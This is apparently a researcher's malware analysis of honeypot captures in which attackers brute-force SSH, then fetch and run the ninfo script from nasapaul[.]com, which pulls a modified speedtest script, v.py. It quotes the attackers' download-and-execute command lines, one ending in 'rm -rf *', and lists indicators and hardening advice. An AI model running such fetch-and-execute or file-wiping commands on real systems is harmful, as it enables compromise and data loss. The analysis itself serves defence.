Updated: 2021-02-28 - Update detection section to explain why v.py might not be flagged by AV.
Updated: 2021-03-03 - Divide article by LM Kill Chain phases instead of MITRE ATT&CK framework.

Case Summary

I collect live malware samples from honeypots running on public cloud servers. This case examines a repeated security event following a successful bruteforce attack against SSH where malware payloads ninfo and v.py are dropped from nasapaul[.]com. The samples examined in this post were captured on February 23rd, 2021.

Timeline

The security event described in this post was first logged at 12:22:55 UTC on 2021-02-14. The event has been captured 33 times, with the latest related security event recorded at 16:03:19 UTC on 2021-02-25. If you are interested in viewing the raw logs associated with these repeated events, they can be found in this gist.

Delivery

In order to see any interaction from attackers on the honeypot, they must first brute force SSH. Successfully brute forcing the username admin and password password will allow the attacker to enter commands into an emulated shell. All entered commands return an error reporting the tool is not found (e.g. ls not found). In all instances of this repeated security event the first payload ninfo is seen after the attacker brute forces SSH.

Exploitation & Installation

In 31 of the 33 captured events calling home to nasapaul[.]com the attacker downloads a payload, gives it execution permissions, and then runs the payload.

wget nasapaul[.]com/ninfo ; chmod +x * ; ./ninfo

Defense Evasion

A change in this behavior is observed in two security events on 2021-02-16 where the following commands are entered:

lscpu ; wget nasapaul[.]com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *

Here, the attacker now runs lscpu and after pulling and running ninfo it deletes all local files with rm -rf *. The rm -rf * is used to recursively destroy files ninfo and v.py in the working directory. Subsequent attacks on 2021-02-16 and later returned to the previous command line behavior, with no file removal process.
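
The two command-line variants described above can be told apart mechanically when triaging honeypot logs. The following is a minimal sketch, not the tooling used for this post: the function name classify and the labels it returns are hypothetical, and the pattern assumes the commands appear in the defanged form shown here.

```python
import re

# Hypothetical pattern for the download / chmod / execute sequence seen in this case.
DOWNLOAD_RUN = re.compile(
    r"wget\s+\S*nasapaul\S*/ninfo\s*;\s*chmod \+x \*\s*;\s*\./ninfo"
)


def classify(command_line: str) -> str:
    """Label a captured command line as one of the two observed variants."""
    if not DOWNLOAD_RUN.search(command_line):
        return "unrelated"
    # Split on ';' so we only flag rm -rf * when it is a command of its own.
    parts = [part.strip() for part in command_line.split(";")]
    if "rm -rf *" in parts:
        return "download-run-cleanup"
    return "download-run"


if __name__ == "__main__":
    print(classify("wget nasapaul[.]com/ninfo ; chmod +x * ; ./ninfo"))
    print(classify("lscpu ; wget nasapaul[.]com/ninfo ; chmod +x * ; ./ninfo ; rm -rf *"))
```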

Collection

The purpose of ninfo is to collect system information. As a reminder, the output of the script is viewed by the attacker via their SSH session. This information can then be scraped, cataloged and/or utilized. The following information is gathered by ninfo:

  • CPU
  • CPU core count
  • CPU stepping (similar to CPU version)
  • CPU bogomips (a crude speed measurement of CPU)
  • GPU type
  • Disk space
  • Uptime
  • OS type
  • OS version
  • OS architecture
  • Root or Privileged Process Access

Code Review

ninfo code review

ninfo script lines 00 - 41

Lines 4 - 19 specify the color used during output. These values are called throughout the script and result in colored formatting of information sent to standard out.

Lines 23 - 37 set variables for requested information. The script uses tools cut, sed, grep, head, and awk in order to manipulate the output of utility commands like lsb_release, free, uname, uptime, lspci, and df and system files including /proc/cpuinfo and /proc/uptime. Using this technique the attacker is able to neatly print system information to the console in lines 55 - 63.
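
To illustrate the kind of parsing involved, here is a rough Python analogue of the CPU portion only. ninfo itself is a shell script built on grep, cut and awk, so this is not the attacker's code; the function name parse_cpuinfo and the SAMPLE text are made up for the example.

```python
def parse_cpuinfo(text: str) -> dict:
    """Summarise /proc/cpuinfo-style text: model, stepping, bogomips, core count."""
    fields = {}
    cores = 0
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue  # blank separator lines between processors
        key, value = key.strip(), value.strip()
        if key == "processor":
            cores += 1
        elif key in ("model name", "stepping", "bogomips"):
            # Keep the first occurrence; every core normally reports the same value.
            fields.setdefault(key, value)
    fields["cores"] = cores
    return fields


# Invented sample in the /proc/cpuinfo layout (tab before the colon).
SAMPLE = """processor\t: 0
model name\t: Example CPU @ 2.00GHz
stepping\t: 3
bogomips\t: 4000.00

processor\t: 1
model name\t: Example CPU @ 2.00GHz
stepping\t: 3
bogomips\t: 4000.00
"""

if __name__ == "__main__":
    print(parse_cpuinfo(SAMPLE))
```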

ninfo script lines 41 - 84

Lines 65 - 71 check to see if the script is running as a privileged process via the EUID or as root via UID. nu ai (not here) is printed if not root. ai (here) is printed if the UID or EUID is 0, indicating the script is running as a privileged process and/or the credentials in use by the attacker are root.
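
The same check is easy to express in Python. This is a sketch of the logic as described above, not a translation of the shell code; privilege_message is a hypothetical name, and os.getuid() and os.geteuid() are only available on Unix-like systems.

```python
import os


def privilege_message(uid: int, euid: int) -> str:
    """Return 'ai' if either the real or effective user ID is 0, else 'nu ai'."""
    return "ai" if uid == 0 or euid == 0 else "nu ai"


if __name__ == "__main__":
    # Report the privilege level of the current process.
    print(privilege_message(os.getuid(), os.geteuid()))
```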

Next, ninfo announces speed testul incepe in 3 secunde (speed test starts in three seconds) then echoes a countdown to standard out. In line 83 it pulls down a second payload from the nasapaul domain named v.py. In line 84 the script attempts to run that payload with perl. The following screenshot shows the output of ninfo if run without network connectivity or simulation:

ninfo color output example

Additional Details

Source IP Origin

The following information was sourced from the Talos Intelligence IP Reputation Lookup. This does not confirm an origin of attack, but rather gives us insight into the last hop on the internet. It is noted all IP addresses are owned by corporations associated with cloud hosting services.

IP               NETWORK OWNER          LOCATION
52.152.130.178   Microsoft Corporation  Washington, United States
64.225.101.223   Digital Ocean          Frankfurt am Main, Germany
167.99.253.119   Digital Ocean          Frankfurt am Main, Germany
167.172.24.118   Digital Ocean          Clifton, United States
178.62.231.95    Digital Ocean          Amsterdam, Netherlands
188.166.99.239   Digital Ocean          Amsterdam, Netherlands
188.166.124.29   Digital Ocean          Amsterdam, Netherlands

A whois search for these IP addresses identifies an organizational link ORG-DOI2-RIPE between some of the attacking IPs:

  • 167.172.24.118/24
  • 178.62.231.95/24
  • 188.166.99.239/24
  • 188.166.124.29/24

DOI2-RIPE org

Language Indicators

An identifying characteristic of this script is that the language used is a mix of English and Romanian. Searching for drept de root, versiune, testul incepe in, and secunde via Google Translate returns a language match for Romanian.

A google search using code from the second payload v.py returns two positive hits:

  1. A malware sample from a github repo of malware collected by honeypots uploaded in DEC 2017.
  2. A speedtest-cli github repository pointing to file speedtest.py from Matt Martz.

To test whether any files from github user sivel are being used by the attacker, I hashed all files from the speedtest-cli github repo and compared these hashes against the hash for v.py. None of the hashes match, which means that if the attacker used a file from this repository it has since been modified. The results are shown below:

86aa0f938b6d6a3b2ba54481f1debae2  v.py

051b5371b2a098f10d8271bbfbcd8ee6  CONTRIBUTING.md
3b83ef96387f14655fc854ddc3c6bd57  LICENSE
89ba249b2bf282b2ea9c35e5fd3a197d  MANIFEST.in
8192020c86e390adb168431fdbf260c1  README.rst
0566968464b829958e9bf431eb1db62f  setup.cfg
2a22f34184b9275db470c39026428709  setup.py
6697b8da88cf890de4b057c0151aad2a  speedtest-cli.1
322eb3ec52f028e6b1df6bd0a9f6cb52  speedtest.py
37547186527ed0466ae145073f9012d1  tox.ini
test/scripts/
51b873473209d18958a05c767723836b  source.py
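
A comparison like this can be scripted. The sketch below is one way to do it with the standard library and is not the command used to produce the listing above; md5_of and find_matches are hypothetical helper names, and the paths in the usage block are placeholders.

```python
import hashlib
from pathlib import Path


def md5_of(path: Path) -> str:
    """Return the hex MD5 digest of a file, read in chunks."""
    digest = hashlib.md5()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def find_matches(sample: Path, repo_dir: Path) -> list:
    """List files under repo_dir whose MD5 equals that of the sample."""
    target = md5_of(sample)
    return sorted(
        str(path.relative_to(repo_dir))
        for path in repo_dir.rglob("*")
        if path.is_file() and md5_of(path) == target
    )


if __name__ == "__main__":
    # Placeholder paths: a local copy of the sample and a clone of the repository.
    sample, repo = Path("v.py"), Path("speedtest-cli")
    if sample.is_file() and repo.is_dir():
        print(find_matches(sample, repo))
```

An empty result only says that no file is byte-for-byte identical; it says nothing about how similar the contents are.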

v.py code review

The file v.py is 803 lines long, substantially longer than ninfo. If you would like to examine this file for yourself it can be retrieved from this github repository. Now we can review the code in v.py in order to understand more about its behavior.

Overview in Comments

This attacker put a lot of comments into their code. We see the following statements printed to console:

1. Retrieving NasaPaul.com configuration
2. Retrieving NasaPaul.com server list

The attacker switches to Romanian (the English translation is shown):

3. Host Server is Google Cloud (Paul hides the IPs)
4. Looking for a server
5. Found a server start testing

And then they use English…

6. testing download speed

Then Romanian…

7. Download speed is XYZ Mbit/s

Then English, and then Romanian again.

8. Testing upload speed
9. The flood upload is XYZ Mbit/s

After which point the script ends and the botnet logs out. Note that XYZ in this instance is a substitute for an upload/download speed value.

Main Function

I begin by looking at the main function def main() found on lines 793 - 797. The only defined functions called here are speedtest() and print_().

def main():
    try:
        speedtest()
    except KeyboardInterrupt:
        print_('\nCancelling...')

The speedtest function is defined in the file on lines 553 - 790. We can get a sense of what the script is doing by logically following the calls to subroutines. This means you follow each call to a defined function, like a choose your own adventure book, instead of reading the file start to finish. You could also read it start to finish if you want to get a sense of the functions that might be called, or to see if anything looks stylistically out of place. This code review will highlight some of the code using the comments printed to the console.

Retrieving configuration from nasapaul[.]com

References to nasapaul[.]com are seen within speedtest() on lines 624 and 632.

Calling home to nasapaul[.]com

The excerpt below has been pulled from lines 623 - 624. Line 623 prints Retrieving NasaPaul.com configuration... to console. This step of the python script executes regardless of internet connectivity.

    if not args.simple:
        print_('\033[1;31m>>>> Retrieving \033[1;37m NasaPaul.com\033[1;m \033[1;31m configuration...')
    try:
        config = getConfig()
    except URLError:
        print_('Cannot retrieve speedtest configuration')
        sys.exit(1)

In case you are wondering why the not args.simple check passes on each execution, note that args is set by the options parser seen in lines 568 to 604. The --simple option uses action='store_true', so args.simple is False unless the flag is supplied, and not args.simple is therefore true. options is created from parser.parse_args(); when it is a tuple, args is taken from its first element. This logic is shared below:

    description = (
        'Command line interface for testing internet bandwidth using '
        'speedtest.net.\n'
        '------------------------------------------------------------'
        '--------------\n'
        'https://github.com/sivel/speedtest-cli')

    parser = ArgParser(description=description)
    # Give optparse.OptionParser an `add_argument` method for
    # compatibility with argparse.ArgumentParser
    try:
        parser.add_argument = parser.add_option
    except AttributeError:
        pass
    parser.add_argument('--bytes', dest='units', action='store_const',
                        const=('byte', 1), default=('bit', 8),
                        help='Display values in bytes instead of bits. Does '
                             'not affect the image generated by --share')
    parser.add_argument('--share', action='store_true',
                        help='Generate and provide a URL to the speedtest.net '
                             'share results image')
    parser.add_argument('--simple', action='store_true',
                        help='Suppress verbose output, only show basic '
                             'information')
    parser.add_argument('--list', action='store_true',
                        help='Display a list of speedtest.net servers '
                             'sorted by distance')
    parser.add_argument('--server', help='Specify a server ID to test against')
    parser.add_argument('--mini', help='URL of the Speedtest Mini server')
    parser.add_argument('--source', help='Source IP address to bind to')
    parser.add_argument('--timeout', default=10, type=int,
                        help='HTTP timeout in seconds. Default 10')
    parser.add_argument('--secure', action='store_true',
                        help='Use HTTPS instead of HTTP when communicating '
                             'with speedtest.net operated servers')
    parser.add_argument('--version', action='store_true',
                        help='Show the version number and exit')

    options = parser.parse_args()
    if isinstance(options, tuple):
        args = options[0]
    else:
        args = options
    del options
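
The effect of action='store_true' can be checked in isolation. This is a small standalone sketch using argparse from the standard library, not an excerpt from v.py; it assumes the script is invoked without --simple, in which case the option is False and the verbose print_ branches run.

```python
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("--simple", action="store_true")

# No flags on the command line: store_true options default to False.
default_args = parser.parse_args([])
# Flag supplied: the option becomes True and the verbose output would be skipped.
simple_args = parser.parse_args(["--simple"])

if __name__ == "__main__":
    print(default_args.simple, not default_args.simple)
    print(simple_args.simple, not simple_args.simple)
```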

Returning to the first block of code, after Retrieving NasaPaul.com configuration... is printed to console, on line 626 we see a call to getConfig(). This function seen in lines 376 - 414 is shared below:

def getConfig():
    """Download the speedtest.net configuration and return only the data
    we are interested in
    """

    request = build_request('://www.speedtest.net/speedtest-config.php')
    uh, e = catch_request(request)
    if e:
        print_('Could not retrieve speedtest.net configuration: %s' % e)
        sys.exit(1)
    configxml = []
    while 1:
        configxml.append(uh.read(10240))
        if len(configxml[-1]) == 0:
            break
    if int(uh.code) != 200:
        return None
    uh.close()
    try:
        try:
            root = ET.fromstring(''.encode().join(configxml))
            config = {
                'client': root.find('client').attrib,
                'times': root.find('times').attrib,
                'download': root.find('download').attrib,
                'upload': root.find('upload').attrib}
        except AttributeError:  # Python3 branch
            root = DOM.parseString(''.join(configxml))
            config = {
                'client': getAttributesByTagName(root, 'client'),
                'times': getAttributesByTagName(root, 'times'),
                'download': getAttributesByTagName(root, 'download'),
                'upload': getAttributesByTagName(root, 'upload')}
    except SyntaxError:
        print_('Failed to parse speedtest.net configuration')
        sys.exit(1)
    del root
    del configxml
    return config

In the function snippet below pulled from getConfig() above, a request is built using build_request for speedtest.net. build_request “build[s] a urllib2 request object to automatically add a user-agent header to all requests” for a url.

    request = build_request('://www.speedtest.net/speedtest-config.php')
    uh, e = catch_request(request)

Following the creation of request, catch_request is described as “a helper function to catch common exceptions when establishing a connection with a HTTP/S request.” The result of the catch_request(request) and any resulting errors are stored in variables uh and e respectively. If an error is created and stored in variable e the script will gracefully exit:

    if e:
        print_('Could not retrieve speedtest.net configuration: %s' % e)
        sys.exit(1)

On lines 386 - 393 of the getConfig() function a variable configxml of type list is created. The response from www.speedtest.net/speedtest-config.php in variable uh is read in chunks of up to 10240 bytes, and each chunk is appended to configxml. configxml[-1] points to the last value in the list. If the length of this value is zero, the response has been fully read and the while loop breaks. If the HTTP status code of the response from speedtest.net is anything other than 200 OK then None is returned from getConfig().

    configxml = []
    while 1:
        configxml.append(uh.read(10240))
        if len(configxml[-1]) == 0:
            break
    if int(uh.code) != 200:
        return None
    uh.close()
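
The read loop can be tried without any network access by substituting an in-memory stream for the HTTP response. This is a minimal sketch of the same pattern; read_all is a hypothetical name and io.BytesIO stands in for the uh handle.

```python
import io


def read_all(handle, chunk_size=10240):
    """Read a file-like object in chunks until an empty read signals the end."""
    chunks = []
    while True:
        chunks.append(handle.read(chunk_size))
        if len(chunks[-1]) == 0:
            break
    return b"".join(chunks)


# 25000 bytes are returned as chunks of 10240, 10240 and 4520, then an empty read.
body = read_all(io.BytesIO(b"x" * 25000))

if __name__ == "__main__":
    print(len(body))
```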

Although the message printed to console reads “Retrieving NasaPaul.com configuration”, this behavior was not confirmed in the python script. Only communication to www.speedtest.net/speedtest-config.php was observed.

Retrieving nasapaul Server List

Lines 631 - 644 handle commands related to the Retrieving NasaPaul[.]com server list... comment printed to console:

    if not args.simple:
        print_('\033[1;31m>>>> Retrieving \033[1;37m NasaPaul.com\033[1;m \033[1;31m  server list...')
    if args.list or args.server:
        servers = closestServers(config['client'], True)
        if args.list:
            serverList = []
            for server in servers:
                line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
                        '[%(d)0.2f km]' % server)
                serverList.append(line)
            print_('\n'.join(serverList).encode('utf-8', 'ignore'))
            sys.exit(0)
    else:
        servers = closestServers(config['client'])

We want to look at the closestServers functions to get a better idea of what servers are being used in this block of code. If you want to review these functions briefly check out this gist.

Looking at the closestServers() definition, the urls in use are:

     urls = [
        '://www.speedtest.net/speedtest-servers-static.php',
        '://c.speedtest.net/speedtest-servers-static.php',
        '://www.speedtest.net/speedtest-servers.php',
        '://c.speedtest.net/speedtest-servers.php',
    ]

Similar to what we’ve seen previously in getConfig(), we see calls out to the listed URLs using build_request and catch_request:

    for url in urls:
        try:
            request = build_request(url)
            uh, e = catch_request(request)
            if e:
                errors.append('%s' % e)
                raise SpeedtestCliServerListError
            serversxml = []
            while 1:
                serversxml.append(uh.read(10240))
                if len(serversxml[-1]) == 0:
                    break
            if int(uh.code) != 200:
                uh.close()
                raise SpeedtestCliServerListError
            uh.close()

Although the message printed to console reads “Retrieving NasaPaul.com server list”, this behavior was not confirmed in the python script. Instead, calls to speedtest.net are seen.

Host Server is Google Cloud (Paul hides the IPs)

On lines 645 and 648 the print_ statement below prints out Server Hostat De (Server hosted by) and Paul ascunde IPu (Paul hides the IP).


    if not args.simple:
        print_('\033[1;31m>>>> Server Hostat De \033[1;m \033[1;37m%(isp)s\033[1;m (\033[1;37mPaul ascunde IPu\033[1;m)\033[1;37m...' % config['client'])

This part of the script prints the ISP in use to console, but no evidence of “hiding IPs” was found in the python script.

Looking for and Finding a Server

Similar to the previous message, the messages Cautam ce-l mai bun server (We are looking for the best server) and Server Gasit incepem Testele (Server found, tests are started) are printed to console prior to a call to getBestServer().

        if not args.simple:
            print_('\033[1;31m>>>> Cautam ce-l mai bun server \033[1;m')
            print_('\033[1;31m>>>> Server Gasit incepem Testele \033[1;m')
        best = getBestServer(servers)

The function getBestServer() is defined on lines 498 - 534:

def getBestServer(servers):
    """Perform a speedtest.net latency request to determine which
    speedtest.net server has the lowest latency
    """

    results = {}
    for server in servers:
        cum = []
        url = '%s/latency.txt' % os.path.dirname(server['url'])
        urlparts = urlparse(url)
        for i in range(0, 3):
            try:
                if urlparts[0] == 'https':
                    h = HTTPSConnection(urlparts[1])
                else:
                    h = HTTPConnection(urlparts[1])
                headers = {'User-Agent': user_agent}
                start = timeit.default_timer()
                h.request("GET", urlparts[2], headers=headers)
                r = h.getresponse()
                total = (timeit.default_timer() - start)
            except (HTTPError, URLError, socket.error):
                cum.append(3600)
                continue
            text = r.read(9)
            if int(r.status) == 200 and text == 'test=test'.encode():
                cum.append(total)
            else:
                cum.append(3600)
            h.close()
        avg = round((sum(cum) / 6) * 1000, 3)
        results[avg] = server
    fastest = sorted(results.keys())[0]
    best = results[fastest]
    best['latency'] = fastest

    return best

In this function, the passed variable servers has been set in lines 634 or 644 via a call to closestServers() using output created from the getConfig() function, discussed in the previous sections. I found no evidence to suggest that any servers related to nasapaul[.]com were queried.
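
The selection step at the end of getBestServer() can be reproduced offline with made-up timings. In this sketch the server names and latency samples are invented, average_latency_ms and pick_best are hypothetical names, and the divisor of 6 is copied as-is from the excerpt above.

```python
def average_latency_ms(samples, divisor=6):
    """Apply the same rounding formula as the excerpt to a list of timings in seconds."""
    return round((sum(samples) / divisor) * 1000, 3)


def pick_best(latencies_by_server):
    """Return (server, latency_ms) for the entry with the lowest computed latency."""
    results = {
        average_latency_ms(samples): name
        for name, samples in latencies_by_server.items()
    }
    fastest = sorted(results.keys())[0]
    return results[fastest], fastest


if __name__ == "__main__":
    timings = {
        "server-a": [0.030, 0.030, 0.030],
        "server-b": [0.012, 0.012, 0.012],
        "server-c": [3600, 3600, 3600],  # the penalty value used for failed requests
    }
    print(pick_best(timings))
```

Because the same formula is applied to every server, the ranking depends only on the relative timings.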

Testing Download and Upload Speeds

Finally, the download and upload speeds are collected using functions downloadSpeed() and uploadSpeed().

    if not args.simple:
        print_(('\033[1;31m>>>> Server Intretinut de \033[1;37m%(sponsor)s\033[1;m (\033[1;37m%(name)s\033[1;m) \033[1;m[\033[1;37m%(d)0.2f km\033[1;m]\033[1;37m:\033[1;37m '
               '%(latency)s ms\033[1;31m' % best).encode('utf-8', 'ignore'))
    else:
        print_('Ping: %(latency)s ms' % best)

    sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
    urls = []
    for size in sizes:
        for i in range(0, 4):
            urls.append('%s/random%sx%s.jpg' %
                        (os.path.dirname(best['url']), size, size))
    if not args.simple:
        print_('>>>> Testing download speed', end='')
    dlspeed = downloadSpeed(urls, args.simple)
    if not args.simple:
        print_()
    print_('>>>> Download-ul este de  : \033[1;37m%0.2f M%s/s' %
           ((dlspeed / 1000 / 1000) * args.units[1], args.units[0]))

    sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
    sizes = []
    for size in sizesizes:
        for i in range(0, 25):
            sizes.append(size)
    if not args.simple:
        print_('\033[1;31m>>>> Testing upload speed', end='')
    ulspeed = uploadSpeed(best['url'], sizes, args.simple)
    if not args.simple:
        print_()
    print_('>>>> Upload-ul de flood este : \033[1;37m%0.2f M%s/s\033[1;31m' %
           ((ulspeed / 1000 / 1000) * args.units[1], args.units[0]))

    if args.share and args.mini:
        print_('Cannot generate a speedtest.net share results image while '
               'testing against a Speedtest Mini server')
    elif args.share:
        dlspeedk = int(round((dlspeed / 1000) * 8, 0))
        ping = int(round(best['latency'], 0))
        ulspeedk = int(round((ulspeed / 1000) * 8, 0))

The uploadSpeed() and downloadSpeed() functions launch FileGetter and FilePutter threads to calculate upload/download speeds. Nothing in these functions appeared malicious, nor did they redirect to a malicious URL.
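
The figures printed to console come from a simple unit conversion. The sketch below isolates that arithmetic; format_speed is a hypothetical name, and it assumes the measured speed is in bytes per second, which the ('bit', 8) default for --bytes implies.

```python
def format_speed(bytes_per_second, units=("bit", 8)):
    """Convert bytes/s to the M<unit>/s string format used in the excerpt."""
    value = (bytes_per_second / 1000 / 1000) * units[1]
    return "%0.2f M%s/s" % (value, units[0])


if __name__ == "__main__":
    print(format_speed(12_500_000))               # default: bits
    print(format_speed(12_500_000, ("byte", 1)))  # as if --bytes were passed
```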

It is noted, however, that the results of the speed test are sent to speedtest[.]net. This code is shown below:

        # Build the request to send results back to speedtest.net
        # We use a list instead of a dict because the API expects parameters
        # in a certain order
        apiData = [
            'download=%s' % dlspeedk,
            'ping=%s' % ping,
            'upload=%s' % ulspeedk,
            'promo=',
            'startmode=%s' % 'pingselect',
            'recommendedserverid=%s' % best['id'],
            'accuracy=%s' % 1,
            'serverid=%s' % best['id'],
            'hash=%s' % md5(('%s-%s-%s-%s' %
                             (ping, ulspeedk, dlspeedk, '297aae72'))
                            .encode()).hexdigest()]

        headers = {'Referer': 'http://c.speedtest.net/flash/speedtest.swf'}
        request = build_request('://www.speedtest.net/api/api.php',
                                data='&'.join(apiData).encode(),
                                headers=headers)
        f, e = catch_request(request)
        if e:
            print_('Could not submit results to speedtest.net: %s' % e)
            sys.exit(1)
        response = f.read()
        code = f.code
        f.close()

In an effort to be clear, I will repeat that speedtest.net is the only domain used in the v.py script aside from the nasapaul[.]com references printed to console using print_(). All network related communication in the v.py script appears limited to speedtest.net.
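
One quick way to triage a script like this is to list every hostname that appears anywhere in its source and then check which ones are actually passed to a request function. The sketch below covers only the first step and is not how the review above was carried out; HOST_PATTERN, its short list of top-level domains, and the SAMPLE text are assumptions made for the example.

```python
import re

# Hypothetical pattern: dotted names ending in a small, hand-picked set of TLDs.
HOST_PATTERN = re.compile(r"(?:[a-z0-9-]+\.)+(?:com|net|org|host)\b", re.IGNORECASE)


def hostnames_in(source: str) -> set:
    """Return the lower-cased hostnames found anywhere in the source text."""
    return {match.lower() for match in HOST_PATTERN.findall(source)}


# A few lines in the style of the excerpts shown in this post.
SAMPLE = '''
print_('>>>> Retrieving NasaPaul.com configuration...')
request = build_request('://www.speedtest.net/speedtest-config.php')
headers = {'Referer': 'http://c.speedtest.net/flash/speedtest.swf'}
'''

if __name__ == "__main__":
    print(sorted(hostnames_in(SAMPLE)))
```

A hit only shows that the name appears in the file. Here NasaPaul.com shows up because it is printed, not because it is contacted, so each hit still needs to be traced by hand.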

Impact

Successful execution of ninfo discloses system specifications, including the hardware or virtualized hardware details and the level of privilege of the compromised login described in the Collection section above. Successful execution of v.py discloses the system’s bandwidth. This information is relayed to the attacker via the SSH session. Typically, these types of collections are stored and re-used, either by the original attacker or by being sold on a criminal network for use in a DDoS-for-hire (DDoSaaS) offering.

All of these attacks originated from successful bruteforce attempts against SSH. There are a few strategies you can use to protect against SSH attacks. You could move SSH to a non-default port (e.g. from port 22 to port 43895). This will subvert some automated attacks, but it is a weak control because the new SSH port can be identified with a simple nmap scan. A more effective way to protect against SSH attacks would be to authenticate using an SSH key or using certificate-based authentication. To pair with this control, you should modify the SSH server configuration file (/etc/ssh/sshd_config) to disable password authentication. You could also use a service like fail2ban to put IPs with repeated failed authentication attempts to SSH on a denylist. For example, if an IP address fails to authenticate 10 times in a row fail2ban would jail the IP, effectively preventing it from being able to log in using SSH for a period of time.
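
To make the jail idea concrete, here is a toy model of the behaviour described in the example: ban an IP after a run of consecutive failures, then let the ban expire. It is not how fail2ban is implemented or configured; FailureTracker, its parameters, and the documentation-range IP addresses are all invented for illustration.

```python
from collections import defaultdict


class FailureTracker:
    """Toy jail logic: ban an IP after max_failures consecutive failed logins."""

    def __init__(self, max_failures=10, ban_seconds=600):
        self.max_failures = max_failures
        self.ban_seconds = ban_seconds
        self.failures = defaultdict(int)
        self.banned_until = {}

    def is_banned(self, ip, now):
        """True while the ban for this IP has not yet expired."""
        return self.banned_until.get(ip, 0) > now

    def record(self, ip, success, now):
        """Record one authentication attempt at time now (in seconds)."""
        if success:
            self.failures[ip] = 0  # a successful login resets the streak
            return
        self.failures[ip] += 1
        if self.failures[ip] >= self.max_failures:
            self.banned_until[ip] = now + self.ban_seconds
            self.failures[ip] = 0


if __name__ == "__main__":
    tracker = FailureTracker()
    for second in range(10):
        tracker.record("203.0.113.5", success=False, now=second)
    print(tracker.is_banned("203.0.113.5", now=10))
```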

Unanswered Questions & Opinions

In my opinion these security events may be the result of a botnet looking for victim hosts to utilize as a part of a DDoS network and/or to be used to serve and collect information about other vulnerable hosts. I have reached this conclusion because the commands seen in the repeated security event are limited to collecting information related to computer specifications and bandwidth. Another potential explanation could be that the botnet is searching for victims to mine cryptocurrency. Without further information, these conclusions are purely speculative.

There are a few questions leftover from this case I am still asking myself. Foremost in my mind is seeing a python script run with perl. I could see perl being remapped to a python binary but this behavior was not seen in ninfo. How does that work? Is the #!/usr/bin/env python on line 1 of the file enough for the interpreter to know to use python instead of perl? If I learn anything new related to this event I’ll update and mark the date at the top of this post and/or link to more information.

Detections

When scanned with ClamAV no detections are yet seen:

clamscan results with clamav

When I first uploaded ninfo to VirusTotal on 2021-02-23 it had 1/64 antivirus detections. Since then, the number has increased to 6/64.

ninfo virustotal results

v.py remains undetected as of 2021-02-27. This is not surprising since the script is a bandwidth test that reaches out to a known good site, Speedtest by Ookla. Whether the script is malicious could be debated, but since this specific copy of v.py is used in the context of data collection, I would flag the hash.

v.py virustotal results

Network

The following IP addresses were associated with one or more successful SSH brute force attacks.

52.152.130.178 
64.225.101.223
167.99.253.119
167.172.24.118
178.62.231.95
188.166.99.239
188.166.124.29

DNS

The following hostnames were associated with one or more of the security events described in this post.

nasapaul[.]com
wpmudev[.]host

File Hashes

md5sum

678af2ec3251f8692c9324ffe64c198a  ninfo
86aa0f938b6d6a3b2ba54481f1debae2  v.py

sha256sum

19778a62055770a9e5f890e52227ccd39251bf23045c15383411638540ceabf7  ninfo
00e430b733cf199747c9c6e0f2e2fae6a045bbed9c0f0f993112b301fcdf5dbc  v.py

MITRE Tactics